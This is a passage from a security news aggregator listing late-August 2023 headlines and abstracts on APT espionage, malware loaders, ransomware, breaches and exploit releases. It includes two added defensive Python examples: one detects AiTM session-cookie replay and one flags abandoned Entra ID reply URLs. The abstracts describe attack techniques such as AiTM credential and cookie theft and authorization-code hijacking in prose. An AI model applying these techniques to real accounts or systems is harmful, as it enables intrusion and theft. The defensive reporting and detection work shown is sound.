Suspected Chinese hackers breached Japan’s cybersecurity agency and potentially accessed sensitive data stored on its networks for nine months before being discovered, it was reported on Tuesday.Cyware
August 29, 2023 – Attack
Chinese Hacking Group Exploits Barracuda Zero-Day to Target Government, Military, and Telecom
Abstract
A suspected Chinese-nexus hacking group exploited a recently disclosed zero-day flaw in Barracuda Networks Email Security Gateway (ESG) appliances to breach government, military, defense and aerospace, high-tech industry, and telecom sectors as part of a global espionage campaign. Mandiant, which is tracking the activity under the name UNC4841, described the threat actor as "highly responsive to defensive efforts" and capable of actively tweaking their modus operandi to maintain persistent access to targets. "UNC4841 deployed new and novel malware designed to maintain presence at a small subset of high priority targets that it compromised either before the patch was released, or shortly following Barracuda's remediation guidance," the Google-owned threat intelligence firm said in a new technical report published today. Almost a third of the identified affected organizations are government agencies. Interestingly enough, some of the earliest compromises ... The Hacker News
August 29, 2023 – General
Meta Fights Sprawling Chinese ‘Spamouflage’ Operation
Abstract
The network typically posted praise for China and its Xinjiang province and criticisms of the United States, Western foreign policies, and critics of the Chinese government including journalists and researchers, the Meta report says.Cyware
August 29, 2023 – Malware
DarkGate Malware Activity Spikes as Developer Rents Out Malware to Affiliates
Abstract
A new malspam campaign has been observed deploying an off-the-shelf malware called DarkGate. "The current spike in DarkGate malware activity is plausible given the fact that the developer of the malware has recently started to rent out the malware to a limited number of affiliates," Telekom Security said in a report published last week. The latest report builds on recent findings from security researcher Igal Lytzki, who detailed a "high volume campaign" that leverages hijacked email threads to trick recipients into downloading the malware. The attack commences with a phishing URL that, when clicked, passes through a traffic direction system (TDS) to take the victim to an MSI payload subject to certain conditions. This includes the presence of a refresh header in the HTTP response. Opening the MSI file triggers a multi-stage process that incorporates an AutoIt script to execute shellcode that acts as a conduit to decrypt and launch DarkGate via a crypte ... The Hacker News
August 29, 2023 – Breach
Compromised OpenCart Payment Module Steals Credit Card Information
Abstract
Attackers are increasingly using backend PHP infections, making it more challenging to detect Magecart infections without access to the compromised website's backend code.Cyware
August 29, 2023 – General
Survey Provides Takeaways for Security Pros to Operationalize their Remediation Life Cycle
Abstract
Ask any security professional and they'll tell you that remediating risks from various siloed security scanning tools requires a tedious and labor-intensive series of steps focused on deduplication, prioritization, and routing of issues to an appropriate "fixer" somewhere in the organization. This burden on already resource-strapped security teams is an efficiency killer. A new study, commissioned by Seemplicity and conducted by Dark Reading, provides fresh insight into how security pros handle the challenging remediation life cycle from discovery to resolution. The research reveals the obstacles security professionals face when coordinating remediation activities. The data exposes the outcomes — in increased workload and diminished risk posture — that arise from lengthy remediation times, inefficient and uncontrolled manual processes, the lack of managerial visibility and oversight across the risk life cycle. Remediation Process Broken Down to Steps and Time Spent on Each Step ... The Hacker News
August 29, 2023 – General
Is the Cybersecurity Community’s Obsession With Compliance Counter-Productive? Full Text
Abstract
Cybersecurity professionals should focus on effectively defending their organizations against common breach types, rather than prioritizing compliance and checking boxes on audit forms.Cyware
August 29, 2023 – Vulnerabilities
Citrix NetScaler Alert: Ransomware Hackers Exploiting Critical Vulnerability Full Text
Abstract
Unpatched Citrix NetScaler systems exposed to the internet are being targeted by unknown threat actors in what's suspected to be a ransomware attack. Cybersecurity company Sophos is tracking the activity cluster under the moniker STAC4663. Attack chains involve the exploitation of CVE-2023-3519, a critical code injection vulnerability impacting NetScaler ADC and Gateway servers that could facilitate unauthenticated remote code execution. In one intrusion detected in mid-August 2023, the security flaw is said to have been used to conduct a domain-wide attack, including injecting payloads into legitimate executables such as the Windows Update Agent (wuauclt.exe) and the Windows Management Instrumentation Provider Service (wmiprvse.exe). An analysis of the payload is underway. Other notable aspects include the distribution of obfuscated PowerShell scripts, PHP web shells, and the use of an Estonian service called BlueVPS for malware staging. Sophos said the modus operandi... The Hacker News
August 29, 2023 – Malware
Android Banking Trojan MMRat Carries Out Bank Fraud via Fake App Stores Full Text
Abstract
MMRat uses customized command-and-control protocols and remains undetected on VirusTotal, highlighting its ability to evade detection and exploit large volumes of data transfer.Cyware
August 29, 2023 – Phishing
Phishing-as-a-Service Gets Smarter: Microsoft Sounds Alarm on AiTM Attacks Full Text
Abstract
Microsoft is warning of an increase in adversary-in-the-middle (AiTM) phishing techniques, which are being propagated as part of the phishing-as-a-service (PhaaS) cybercrime model. In addition to an uptick in AiTM-capable PhaaS platforms, the tech giant noted that existing phishing services like PerSwaysion are incorporating AiTM capabilities. "This development in the PhaaS ecosystem enables attackers to conduct high-volume phishing campaigns that attempt to circumvent MFA protections at scale," the Microsoft Threat Intelligence team said in a series of posts on X (formerly Twitter). Phishing kits with AiTM capabilities work in two ways, one of which concerns the use of reverse proxy servers (i.e., the phishing page) to relay traffic to and from the client and legitimate website and stealthily capture user credentials, two-factor authentication codes, and session cookies. A second method involves synchronous relay servers. "In AiTM through synchronous relay s... The Hacker News
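An AiTM reverse proxy does not break MFA; it steals the session cookie that is issued after MFA succeeds, so the attacker's later requests arrive as an already-authenticated session from a different IP. One detection signal that follows directly from that mechanism is a session cookie presented from a source IP other than the one that completed the interactive MFA sign-in. The following is an added example, not code from Microsoft or from the article: it runs that check over a constructed, simplified sign-in record layout (the tuple fields and the "interactive_mfa"/"cookie" labels are assumptions; real identity-provider logs carry the equivalent as session/correlation IDs and authentication-requirement fields).

```python
"""Flag session cookies replayed from a different source IP after an MFA-satisfied sign-in.

Added example; the record layout is a constructed simplification, not a real sign-in log schema.
"""
from collections import defaultdict
from datetime import datetime

# Constructed sign-in records: (UTC time, user, session id, source IP, auth kind).
# auth kind is "interactive_mfa" (credentials + MFA entered) or "cookie" (session cookie presented).
SAMPLE_SIGNINS = [
    ("2023-08-29T08:00:00Z", "alice@example.com", "sess-A1", "203.0.113.10",  "interactive_mfa"),
    ("2023-08-29T08:02:30Z", "alice@example.com", "sess-A1", "198.51.100.77", "cookie"),  # replayed via AiTM
    ("2023-08-29T09:00:00Z", "bob@example.com",   "sess-B7", "203.0.113.10",  "interactive_mfa"),
    ("2023-08-29T15:00:00Z", "bob@example.com",   "sess-B7", "203.0.113.10",  "cookie"),  # same IP: benign
    ("2023-08-30T10:00:00Z", "carol@example.com", "sess-C2", "192.0.2.9",     "cookie"),  # no MFA event to compare
]


def _parse_ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def find_cookie_replays(records):
    """Return one alert per session whose cookie was presented from an IP other than the
    one that completed MFA. Events are processed in time order, so a later interactive
    sign-in from a new IP (which itself passed MFA) resets the expected IP instead of alerting."""
    by_session = defaultdict(list)
    for ts, user, session_id, ip, kind in records:
        by_session[session_id].append((_parse_ts(ts), user, ip, kind))

    alerts = []
    for session_id, events in by_session.items():
        events.sort()
        mfa_ip, mfa_time = None, None
        for ts, user, ip, kind in events:
            if kind == "interactive_mfa":
                mfa_ip, mfa_time = ip, ts
            elif kind == "cookie" and mfa_ip is not None and ip != mfa_ip:
                alerts.append({
                    "user": user,
                    "session_id": session_id,
                    "mfa_ip": mfa_ip,
                    "replay_ip": ip,
                    "minutes_after_mfa": (ts - mfa_time).total_seconds() / 60,
                })
                break  # one alert per session is enough
    return alerts


if __name__ == "__main__":
    for alert in find_cookie_replays(SAMPLE_SIGNINS):
        print(alert)
```

The IP comparison is a heuristic: mobile users roam, and a proxy-aware attacker can relay from the victim's region, so in production the check is stronger when combined with ASN or device-compliance signals. The structural fix is phishing-resistant MFA (FIDO2/WebAuthn), whose assertions are bound to the origin the browser actually connected to, so a proxy on another domain cannot replay them.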
August 29, 2023 – Criminals
Web Control, Crime Patrol or Real Pawns in Cybercrime Full Text
Abstract
A group of young employees in Hyderabad ran a sophisticated scam using VOIP to target unsuspecting people in the U.S. and trick them into buying gift cards, which were then converted into cryptocurrency and Indian Rupees.Cyware
August 28, 2023 – Attack
Attacks on Citrix NetScaler systems linked to ransomware actor Full Text
Abstract
A threat actor believed to be tied to the FIN8 hacking group exploits the CVE-2023-3519 remote code execution flaw to compromise unpatched Citrix NetScaler systems in domain-wide attacks.BleepingComputer
August 28, 2023 – Attack
Signs of Malware Attack Targeting Rust Developers Found on Crates.io Full Text
Abstract
The Rust Foundation was notified and it quickly removed the packages and locked the uploader’s account. GitHub was also notified and took action against the associated account.Cyware
August 28, 2023 – Vulnerabilities
Experts Uncover How Cybercriminals Could Exploit Microsoft Entra ID for Elevated Privilege Full Text
Abstract
Cybersecurity researchers have discovered a case of privilege escalation associated with a Microsoft Entra ID (formerly Azure Active Directory) application by taking advantage of an abandoned reply URL. "An attacker could leverage this abandoned URL to redirect authorization codes to themselves, exchanging the ill-gotten authorization codes for access tokens," Secureworks Counter Threat Unit (CTU) said in a technical report published last week. "The threat actor could then call Power Platform API via a middle-tier service and obtain elevated privileges." Following responsible disclosure on April 5, 2023, the issue was addressed by Microsoft via an update released a day later. Secureworks has also made available an open-source tool that other organizations can use to scan for abandoned reply URLs. Reply URL, also called redirect URI, refers to the location where the authorization server sends the user once the app has been successfully authorized and grant... The Hacker News
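The attack works because the authorization server will happily send the authorization code to any reply URL still registered on the application; if the hostname behind one of those URLs has been decommissioned (a deleted Azure web app, an expired domain), whoever re-registers it receives the codes. The check every tenant owner wants is therefore simple: for each registered reply URL, does the host still resolve, and is the URL itself tightly scoped? The following is an added example, not the Secureworks tool or Microsoft code: it classifies a constructed list of reply URLs, with DNS resolution injectable so the sample runs offline (the hostnames are assumptions, and `old-app.azurewebsites.net` is assumed to have been abandoned).

```python
"""Classify Entra ID app reply URLs and flag ones whose host no longer resolves.

Added example. In practice the URL list comes from the app registration
(Microsoft Graph: the application's web.redirectUris / spa.redirectUris).
"""
import socket
from urllib.parse import urlparse

# Constructed sample reply URLs for a hypothetical app registration.
SAMPLE_REPLY_URLS = [
    "https://portal.example.com/signin-oidc",
    "https://old-app.azurewebsites.net/auth/callback",  # assumed abandoned: app deleted, name free
    "http://localhost:5000/callback",                    # developer loopback, allowed over http
    "https://*.contoso.com/callback",                    # wildcard: any subdomain can receive codes
]


def _host_resolves(host):
    """Default resolver: a host that no longer resolves is a takeover candidate."""
    try:
        socket.getaddrinfo(host, None)
        return True
    except socket.gaierror:
        return False


def classify_reply_url(url, resolves=_host_resolves):
    """Return 'ok', 'abandoned', 'weak', 'local' or 'invalid' for one reply URL."""
    parsed = urlparse(url)
    host = parsed.hostname
    if host is None:
        return "invalid"
    if host in ("localhost", "127.0.0.1", "::1"):
        return "local"
    # Plain http leaks the code on the wire; a wildcard lets any subdomain collect it.
    if parsed.scheme != "https" or "*" in parsed.netloc:
        return "weak"
    return "ok" if resolves(host) else "abandoned"


def find_abandoned(urls, resolves=_host_resolves):
    """URLs whose host does not resolve: remove them, or re-claim the host before someone else does."""
    return [u for u in urls if classify_reply_url(u, resolves) == "abandoned"]


if __name__ == "__main__":
    for url in SAMPLE_REPLY_URLS:
        print(f"{classify_reply_url(url):10} {url}")
```

A non-resolving host is a hint, not proof: the real question is whether an attacker can register that name (an unused `*.azurewebsites.net` label, a lapsed domain). The fix is to prune every reply URL that no longer belongs to a running, owned service, which is also what the April 2023 Microsoft change addressed on the first-party side.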
August 28, 2023 – Malware
MalDoc in PDFs: Hiding malicious Word docs in PDF files Full Text
Abstract
Japan's computer emergency response team (JPCERT) is sharing a new 'MalDoc in PDF' attack detected in July 2023 that bypasses detection by embedding malicious Word files into PDFs.BleepingComputer
August 28, 2023 – Privacy
Uncovering a Privacy-Preserving Approach to Machine Learning Full Text
Abstract
In the era of data-driven decision making, businesses are harnessing the power of machine learning (ML) to unlock valuable insights, gain operational efficiencies, and solidify competitive advantage.Cyware
August 28, 2023 – Malware
Developers Beware: Malicious Rust Libraries Caught Transmitting OS Info to Telegram Channel Full Text
Abstract
In yet another sign that developers continue to be targets of software supply chain attacks, a number of malicious packages have been discovered on the Rust programming language's crate registry. The libraries, uploaded between August 14 and 16, 2023, were published by a user named "amaperf," Phylum said in a report published last week. The names of the packages, now taken down, are as follows: postgress, if-cfg, xrvrv, serd, oncecell, lazystatic, and envlogger. It's not clear what the end goal of the campaign was, but the suspicious modules were found to harbor functionalities to capture the operating system information (i.e., Windows, Linux, macOS, or Unknown) and transmit the data to a hard-coded Telegram channel via the messaging platform's API. This suggests that the campaign may have been in its early stages and that the threat actor may have been casting a wide net to compromise as many developer machines as possible to deliver rogue updates with imp... The Hacker News
August 28, 2023 – Solution
Microsoft will enable Exchange Extended Protection by default this fall Full Text
Abstract
Microsoft announced today that Windows Extended Protection will be enabled by default on servers running Exchange Server 2019 starting this fall after installing the 2023 H2 Cumulative Update (CU14).BleepingComputer
August 28, 2023 – General
Vendors Training AI With Customer Data Is an Enterprise Risk Full Text
Abstract
Zoom received some flak recently for planning to use customer data to train its machine learning models. The reality, however, is that the video conferencing company is not the first, nor will it be the last, to have similar plans.Cyware
August 28, 2023 – General
Cyberattacks Targeting E-commerce Applications Full Text
Abstract
Cyber attacks on e-commerce applications are a common trend in 2023: as e-commerce businesses become more omnichannel, they build and deploy increasingly more API interfaces, with threat actors constantly exploring more ways to exploit vulnerabilities. This is why regular testing and ongoing monitoring are necessary to fully protect web applications, identifying weaknesses so they can be mitigated quickly. In this article, we will discuss the recent Honda e-commerce platform attack, how it happened, and its impact on the business and its clients. In addition to the importance of application security testing, we will also discuss the different areas of vulnerability testing and its various phases. Finally, we will provide details on how a long-term preventative solution such as PTaaS can protect e-commerce businesses and the differences between continuous testing (PTaaS) and standard pen testing. The 2023 Honda E-commerce Platform Attack Honda's power equipment, lawn, garden, and... The Hacker News
August 28, 2023 – Phishing
Spain warns of LockBit Locker ransomware phishing attacks Full Text
Abstract
The National Police of Spain is warning of an ongoing 'LockBit Locker' ransomware campaign targeting architecture companies in the country through phishing emails.BleepingComputer
August 28, 2023 – Vulnerabilities
PoC for Unauthenticated RCE on Juniper Networks Firewalls Released Full Text
Abstract
Researchers have released additional details about the recently patched four vulnerabilities affecting Juniper Networks’ SRX firewalls and EX switches that could allow remote code execution (RCE), as well as a proof-of-concept (PoC) exploit.Cyware
August 28, 2023 – Botnet
KmsdBot Malware Gets an Upgrade: Now Targets IoT Devices with Enhanced Capabilities Full Text
Abstract
An updated version of a botnet malware called KmsdBot is now targeting Internet of Things (IoT) devices, simultaneously branching out its capabilities and the attack surface. "The binary now includes support for Telnet scanning and support for more CPU architectures," Akamai security researcher Larry W. Cashdollar said in an analysis published this month. The latest iteration, observed since July 16, 2023, comes months after it emerged that the botnet is being offered as a DDoS-for-hire service to other threat actors. The fact that it's being actively maintained indicates its effectiveness in real-world attacks. KmsdBot was first documented by the web infrastructure and security company in November 2022. It's mainly designed to target private gaming servers and cloud hosting providers, although it has since set its eyes on some Romanian government and Spanish educational sites. The malware is designed to scan random IP addresses for open SSH ports and... The Hacker News
August 28, 2023 – Vulnerabilities
Exploit released for Juniper firewall bugs allowing RCE attacks Full Text
Abstract
Proof-of-concept exploit code has been publicly released for vulnerabilities in Juniper SRX firewalls that, when chained, can allow unauthenticated attackers to gain remote code execution in Juniper's JunOS on unpatched devices.BleepingComputer
August 28, 2023 – Outage
Leaseweb Reports Cloud Disruptions Due to Cyberattack Full Text
Abstract
“The issue had an impact on a specific portion of our cloud-based infrastructure leading to downtime for a small number of cloud customers,” Leaseweb told customers in an email notification.Cyware
August 28, 2023 – Breach
Mom’s Meals discloses data breach impacting 1.2 million people Full Text
Abstract
PurFoods, which conducts business in the U.S. as 'Mom's Meals,' is warning of a data breach after the personal information of 1.2 million customers and employees was stolen in a ransomware attack.BleepingComputer
August 28, 2023 – Denial Of Service
Tor Tweaks Onion Routing Software to Fend Off DDoS Attacks Full Text
Abstract
The updated software now supports a proof-of-work challenge called EquiX. Designed by Tevador, who developed Monero's proof-of-work algorithm, it is "a CPU-friendly client puzzle with fast verification and small solution size (16 bytes)."Cyware
August 28, 2023 – General
Four common password mistakes hackers love to exploit Full Text
Abstract
Threat actors take advantage of common password mistakes to breach corporate networks. Learn more from Specops Software on the four most common mistakes and how to strengthen your Active Directory against these risks.BleepingComputer
August 28, 2023 – Breach
Hacking Group Kittensec Claims to ‘Pwn Anything We See’ to Expose Corruption Full Text
Abstract
On July 28, KittenSec claimed in a Telegram post to have hacked multiple Romanian government systems and posted a file containing roughly 36 gigabytes of data, including emails, documents, contracts, and healthcare-related data.Cyware
August 28, 2023 – Government
CISA Touts ‘Tremendous Growth’ in Vulnerability Disclosure Platform Full Text
Abstract
The Vulnerability Disclosure Policy (VDP) Platform has seen “tremendous growth” in onboarding 40 agency programs since its launch in July 2021, the Cybersecurity and Infrastructure Security Agency said Friday in a news release.Cyware
August 27, 2023 – Breach
Rhysida claims ransomware attack on Prospect Medical, threatens to sell data Full Text
Abstract
The Rhysida ransomware gang has claimed responsibility for the massive cyberattack on Prospect Medical Holdings, claiming to have stolen 500,000 social security numbers, corporate documents, and patient records.BleepingComputer
August 27, 2023 – Attack
Lazarus Exploits ManageEngine to Deploy QuiteRAT Full Text
Abstract
The Lazarus group was associated with a new campaign against healthcare entities in Europe and the U.S. In this campaign, the attackers exploited a ManageEngine ServiceDesk vulnerability (CVE-2022-47966) to distribute the QuiteRAT malware. The malware has many capabilities similar to MagicRAT, anot... Cyware
August 26, 2023 – Ransomware
LockBit 3.0 Ransomware Builder Leak Gives Rise to Hundreds of New Variants Full Text
Abstract
The leak of the LockBit 3.0 ransomware builder last year has led to threat actors abusing the tool to spawn new variants. Russian cybersecurity company Kaspersky said it detected a ransomware intrusion that deployed a version of LockBit but with a markedly different ransom demand procedure. "The attacker behind this incident decided to use a different ransom note with a headline related to a previously unknown group, called NATIONAL HAZARD AGENCY," security researchers Eduardo Ovalle and Francesco Figurelli said. The revamped ransom note directly specified the amount to be paid to obtain the decryption keys, and directed communications to a Tox service and email, unlike the LockBit group, which doesn't mention the amount and uses its own communication and negotiation platform. NATIONAL HAZARD AGENCY is far from the only cybercrime gang to use the leaked LockBit 3.0 builder. Some of the other threat actors known to leverage it include Bl00dy and Buhti. Kaspersk... The Hacker News
August 26, 2023 – Policy and Law
UnitedHealthcare Fined $80K for Six-Month Records Access Delay Full Text
Abstract
The HHS' Office for Civil Rights said UnitedHealthcare had agreed to settle a case involving potential HIPAA violations related to allegations that the company took six months to fulfill a health plan member's request to access his PHI.Cyware
August 26, 2023 – Breach
Kroll Suffers Data Breach: Employee Falls Victim to SIM Swapping Attack Full Text
Abstract
Risk and financial advisory solutions provider Kroll on Friday disclosed that one of its employees fell victim to a "highly sophisticated" SIM swapping attack. The incident, which took place on August 19, 2023, targeted the employee's T-Mobile account, the company said. "Specifically, T-Mobile, without any authority from or contact with Kroll or its employee, transferred that employee's phone number to the threat actor's phone at their request," it said in an advisory. This enabled the unidentified actor to gain access to certain files containing personal information of bankruptcy claimants in the matters of BlockFi, FTX, and Genesis. SIM swapping (aka SIM splitting or simjacking), while generally a benign process, could be exploited by threat actors to fraudulently activate a SIM card under their control with a victim's phone number. This makes it possible to intercept SMS messages and voice calls and receive MFA-related messages that cont... The Hacker News
August 26, 2023 – Malware
The Three Malware Loaders Behind 80% of Incidents Full Text
Abstract
QakBot, SocGholish, and Raspberry Robin are the most prevalent malware loaders causing havoc for security teams, with QakBot being the most versatile and persistent threat.Cyware
August 26, 2023 – Policy and Law
DOJ Charged Tornado Cash Founders With Laundering More Than $1 Billion Full Text
Abstract
The duo operated the Tornado Cash cryptocurrency mixer that facilitated more than $1 billion in money laundering transactions and laundered hundreds of millions of dollars for the Lazarus APT group.Cyware
August 26, 2023 – Criminals
Adversary On The Defense: ANTIBOT.PW Full Text
Abstract
The Antibot web traffic filtering service, originally a GitHub project, has evolved into a commercial platform for malicious actors, offering features like cloaking to evade analysis and prolong phishing and malware campaigns.Cyware
August 26, 2023 – Breach
Malwarebytes Announces Acquisition of Online Privacy Company Cyrus Full Text
Abstract
This strategic acquisition reinforces Malwarebytes' commitment to privacy by giving users more control over their information, no matter where or how they choose to browse and interact online.Cyware
August 26, 2023 – Criminals
Update: Prospect Medical Stolen Data Listed for Sale by Emerging Ransomware Group Full Text
Abstract
The Rhysida ransomware group claimed responsibility for a ransomware attack against Prospect Medical Holdings that forced multiple hospital closures earlier this month and continues to impact operations.Cyware
August 26, 2023 – Breach
Thousands of SSNs Leaked After Ransomware Attack on Ohio State Archive Organization Full Text
Abstract
One of the oldest historical societies in the state of Ohio was hit with a ransomware attack that leaked the sensitive information of thousands, according to a statement the organization released this week.Cyware
August 26, 2023 – Business
Cypago Raises $13 Million for GRC Automation Platform Full Text
Abstract
The new investment will allow Cypago to expand its research and development, product, and go-to-market teams, and grow its presence in the North American and European markets.Cyware
August 25, 2023 – Breach
Bankrupt Crypto Platforms FTX and BlockFi Warn Customers of Data Breach Full Text
Abstract
FTX learned that Kroll, the claims agent in the bankruptcy, experienced a cybersecurity incident that compromised non-sensitive customer data of certain claimants in the pending bankruptcy case.Cyware
August 25, 2023 – Policy and Law
Two LAPSUS$ Hackers Convicted in London Court for High-Profile Tech Firm Hacks Full Text
Abstract
Two U.K. teenagers have been convicted by a jury in London for being part of the notorious LAPSUS$ transnational gang and for orchestrating a series of brazen, high-profile hacks against major tech firms and demanding a ransom in exchange for not leaking the stolen information. This includes Arion Kurtaj (aka White, Breachbase, WhiteDoxbin, and TeaPotUberHacker), an 18-year-old from Oxford, and an unnamed minor, who began collaborating in July 2021 after having met online, BBC reported this week. Both the defendants were initially arrested and released under investigation in January 2022, only to be re-arrested and charged by the City of London Police in April 2022. Kurtaj was subsequently granted bail and moved to a hotel in Bicester after he was doxxed in an online cybercrime forum. He, however, continued his hacking spree, targeting companies like Uber, Revolut, and Rockstar Games, as a result of which he was arrested again in September. Another alleged member of the... The Hacker News
August 25, 2023
China-linked Flax Typhoon APT targets Taiwan Full Text
Abstract
China-linked APT group Flax Typhoon targeted dozens of organizations in Taiwan as part of a suspected espionage campaign. Microsoft linked the Chinese APT Flax Typhoon (aka Ethereal Panda) to a cyber espionage campaign that targeted dozens of organizations...Security Affairs
August 25, 2023 – Vulnerabilities
Cisco NX-OS Software TACACS+ or RADIUS Remote Authentication Directed Request Denial of Service Vulnerability Full Text
Abstract
This vulnerability can only be exploited over Telnet, which is disabled by default, or over the console management connection. This vulnerability cannot be exploited over SSH connections to the device.Cyware
August 25, 2023 – Education
Learn How Your Business Data Can Amplify Your AI/ML Threat Detection Capabilities Full Text
Abstract
In today's digital landscape, your business data is more than just numbers—it's a powerhouse. Imagine leveraging this data not only for profit but also for enhanced AI and Machine Learning (ML) threat detection. For companies like Comcast, this isn't a dream. It's reality. Your business comprehends its risks, vulnerabilities, and the unique environment in which it operates. No generic, one-size-fits-all tool can capture this nuance. By utilizing your own data, you position yourself ahead of potential threats, enabling informed decisions and safeguarding your assets. Join our groundbreaking webinar, "Clean Data, Better Detections: Using Your Business Data for AI/ML Detections," to unearth how your distinct business data can be the linchpin to amplifying your AI/ML threat detection prowess. This webinar will endow you with the insights and tools necessary to harness your business data, leading to sharper, more efficient, and potent threat detections. UPC... The Hacker News
August 25, 2023 – Botnet
Whiffy Recon malware triangulates the position of infected systems via Wi-Fi Full Text
Abstract
Experts observed the SmokeLoader malware delivering a new Wi-Fi scanning malware strain dubbed Whiffy Recon. Secureworks Counter Threat Unit (CTU) researchers observed the Smoke Loader botnet dropping a new Wi-Fi scanning malware named Whiffy Recon....Security Affairs
August 25, 2023 – Ransomware
Ransomware With an Identity Crisis Targets Small Businesses, Individuals Full Text
Abstract
A key reason it was so tricky for researchers to identify TZW as a spinoff of Adhubllka is because of the small ransom demands the group typically makes. At such a level, victims often pay attackers and the attackers continue to fly under the radar.Cyware
August 25, 2023 – Education
Navigating Legacy Infrastructure: A CISO’s Actionable Strategy for Success Full Text
Abstract
Every company has some level of tech debt. Unless you're a brand new start-up, you most likely have a patchwork of solutions that have been implemented throughout the years, often under various leadership teams with different priorities and goals. As those technologies age, they can leave your organization vulnerable to cyber threats. While replacing legacy technologies can be costly, those costs may pale in comparison to a breach – both in terms of immediate financial impact and reputational damage. Here are three ways you can communicate risk to your leadership team as you work to replace legacy infrastructure. 1: Make the Risk Real Leadership teams are driven by quantifiable business implications. The best way to get support for updating or replacing legacy technology is to make the risk to the business real - and measurable - in a language they understand. One way to do this is to look at the list of critical vulnerabilities that you've identified, then evaluate the impact t... The Hacker News
August 25, 2023 – Government
FBI: Patches for Barracuda ESG Zero-Day CVE-2023-2868 are ineffective Full Text
Abstract
The FBI warned that patches for a critical Barracuda ESG flaw CVE-2023-2868 are "ineffective" and patched appliances are still being hacked. The Federal Bureau of Investigation warned that security patches for critical vulnerability CVE-2023-2868...Security Affairs
August 25, 2023 – Breach
Nearly 1,000 Organizations, 60 Million Individuals Impacted by MOVEit Hack Full Text
Abstract
On August 14 and 15, the cybercriminals leaked nearly 1 Tb of information allegedly stolen from 16 of the victims, Resecurity said. These victims include UCLA, Siemens Energy, Cognizant, and cybersecurity firms Norton LifeLock and Netscout.Cyware
August 25, 2023 – Hacker
China-Linked Flax Typhoon Cyber Espionage Targets Taiwan’s Key Sectors Full Text
Abstract
A nation-state activity group originating from China has been linked to cyber attacks on dozens of organizations in Taiwan as part of a suspected espionage campaign. The Microsoft Threat Intelligence team is tracking the activity under the name Flax Typhoon, which is also known as Ethereal Panda. "Flax Typhoon gains and maintains long-term access to Taiwanese organizations' networks with minimal use of malware, relying on tools built into the operating system, along with some normally benign software to quietly remain in these networks," the company said. It further said it hasn't observed the group weaponize the access to conduct data-collection and exfiltration. A majority of the targets include government agencies, educational institutions, critical manufacturing, and information technology organizations in Taiwan. A smaller number of victims have also been detected in Southeast Asia, North America, and Africa. The group is suspected to have been active si... The Hacker News
August 25, 2023 – Breach
Title Lender TMX Now Says Payment Card Data Stolen in Breach Full Text
Abstract
A revised data breach notification is being sent to victims stating that attackers may have also stolen their credit/debit card number, beyond the raft of personal information.Cyware
August 25, 2023 – Vulnerabilities
Urgent FBI Warning: Barracuda Email Gateways Vulnerable Despite Recent Patches Full Text
Abstract
The U.S. Federal Bureau of Investigation (FBI) is warning that Barracuda Networks Email Security Gateway (ESG) appliances patched against a recently disclosed critical flaw continue to be at risk of potential compromise from suspected Chinese hacking groups. It also deemed the fixes as "ineffective" and that it "continues to observe active intrusions and considers all affected Barracuda ESG appliances to be compromised and vulnerable to this exploit." Tracked as CVE-2023-2868 (CVSS score: 9.8), the zero-day bug is said to have been weaponized as early as October 2022, more than seven months before the security hole was plugged. Google-owned Mandiant is tracking the China-nexus activity cluster under the name UNC4841. The remote command injection vulnerability, impacting versions 5.1.3.001 through 9.2.0.006, allows for unauthorized execution of system commands with administrator privileges on the ESG product. In the attacks observed so far, a successful b... The Hacker News
August 25, 2023 – Attack
China-based ‘Flax Typhoon’ hackers targeting Taiwan govt: Microsoft Full Text
Abstract
The activities observed suggest the threat actor intends to perform espionage and maintain access to organizations across a broad range of industries for as long as possible.Cyware
August 25, 2023 – General
Time keeps on slippin’ slippin’ slippin’: The 2023 Active Adversary Report for Tech Leaders Full Text
Abstract
In H1 2023, compromised credentials accounted for 50% of root causes, whereas exploiting a bug came in at 23%. We can’t conclusively say that attackers are favoring compromised credentials over vulnerabilities, but it can’t be denied either.Cyware
August 25, 2023 – Hacker
New Luna Grabber Poses as Roblox Packages, Strikes NPM Full Text
Abstract
Malicious actors are targeting Roblox developers with a new malware called Luna Grabber, distributed through npm packages that impersonate legitimate software. These fake packages, including noblox.js-vps, noblox.js-ssh, and noblox.js-secure, house malicious multi-stage payloads. This campaign... Cyware
August 25, 2023 – Vulnerabilities
Researchers released PoC exploit for Ivanti Sentry flaw CVE-2023-38035 Full Text
Abstract
The vulnerability could be exploited to access sensitive API data and configurations, run system commands, or write files onto the system. The vulnerability CVE-2023-38035 impacts Sentry versions 9.18 and prior.Cyware
August 24, 2023 – Cryptocurrency
Millions stolen from crypto platforms Exactly Protocol and Harbor Protocol Full Text
Abstract
Two DeFi platforms, Exactly and Harbor, fell victim to cyberattacks resulting in the theft of millions of dollars' worth of cryptocurrency. Exactly Protocol confirmed suffering a loss of around $7.3 million worth of ETH.Cyware
August 24, 2023 – Hacker
Lazarus Group Exploits Critical Zoho ManageEngine Flaw to Deploy Stealthy QuiteRAT Malware Full Text
Abstract
The North Korea-linked threat actor known as Lazarus Group has been observed exploiting a now-patched critical security flaw impacting Zoho ManageEngine ServiceDesk Plus to distribute a remote access trojan called QuiteRAT. Targets include internet backbone infrastructure and healthcare entities in Europe and the U.S., cybersecurity company Cisco Talos said in a two-part analysis published today. What's more, a closer examination of the adversary's recycled attack infrastructure in its cyber assaults on enterprises has led to the discovery of a new threat dubbed CollectionRAT. The fact that the Lazarus Group continues to rely on the same tradecraft despite those components being well-documented over the years underscores the threat actor's confidence in their operations, Talos pointed out. QuiteRAT is said to be a successor to MagicRAT, itself a follow-up to TigerRAT, while CollectionRAT appears to share overlaps with EarlyRAT (aka Jupiter), an im... The Hacker News
August 24, 2023 – Vulnerabilities
Researchers released PoC exploit for Ivanti Sentry flaw CVE-2023-38035 Full Text
Abstract
Proof-of-concept exploit code for critical Ivanti Sentry authentication bypass flaw CVE-2023-38035 has been released. Researchers released a proof-of-concept (PoC) exploit code for critical Ivanti Sentry authentication bypass vulnerability CVE-2023-38035...Security Affairs
August 24, 2023 – Malware
Smoke Loader Drops Whiffy Recon Wi-Fi Scanning and Geolocation Malware Full Text
Abstract
Whiffy Recon works by checking for the WLAN AutoConfig service (WLANSVC) on the infected system and terminating itself if the service name doesn't exist. Persistence is achieved by means of a shortcut that's added to the Windows Startup folder.Cyware
August 24, 2023 – Phishing
New Telegram Bot “Telekopye” Powering Large-scale Phishing Scams from Russia Full Text
Abstract
